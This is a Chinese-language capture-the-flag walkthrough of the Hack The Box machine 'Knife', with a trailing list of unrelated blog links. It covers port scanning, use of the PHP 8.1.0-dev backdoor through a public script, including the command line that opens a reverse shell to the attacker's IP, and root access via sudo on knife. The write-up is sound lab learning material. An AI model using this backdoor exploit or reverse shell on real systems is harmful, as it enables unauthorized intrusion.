Linux/Knife

Knife

Enumeration

nmap

第一次扫描发现系统对外开放了22和80端口,端口详细信息如下

系统对外开放了2个端口,22的ssh和80的http,先访问web看看

单看该服务,并没有发现有趣的东西,wappalyzer显示php版本为8.1.0

PHP 8.1.0-dev - 'User-Agentt' Remote Code Execution

搜索发现该版本php存在后门漏洞,可以远程执行代码

首先将该漏洞利用脚本下载到工作目录,我这里用了github的脚本

然后执行python脚本,输入url,本机ip,设置监听端口,在本地开启监听,然后执行python脚本

复制代码
usage: revshell_php_8.1.0-dev.py [-h] <target URL> <attacker IP> <attacker PORT> python revshell_php_8.1.0-dev.py http://10.10.10.242 10.10.14.3 4444

在python执行界面中没有反应,但是监听端获取到shell

Privilege Escalation

直接使用sudo -l发现可以使用root权限执行knife程序,且不需要密码

在gtfobins中发现knife可以利用,如图

执行指令即可获取root权限

相关推荐
Ronin30529 分钟前
【Linux系统】进程间通信:System V IPC——共享内存
linux·服务器·system v 共享内存
网硕互联的小客服1 小时前
Apache 如何支持SHTML(SSI)的配置方法
运维·服务器·网络·windows·php
基于python的毕设2 小时前
C语言栈的实现
linux·c语言·ubuntu
苏琢玉2 小时前
如何让同事自己查数据?写一个零依赖 PHP SQL 查询工具就够了
mysql·php
luoqice2 小时前
linux下找到指定目录下最新日期log文件
linux·算法
林开落L2 小时前
库的制作与原理
linux·开发语言·动静态库·库的制作
2401_888423093 小时前
Linux软件编程-线程(2)
linux
共享家95274 小时前
linux-数据链路层
linux·网络·macos
Demisse4 小时前
[Linux] Linux文件系统基本管理
linux·运维·服务器
小米里的大麦5 小时前
025 理解文件系统
linux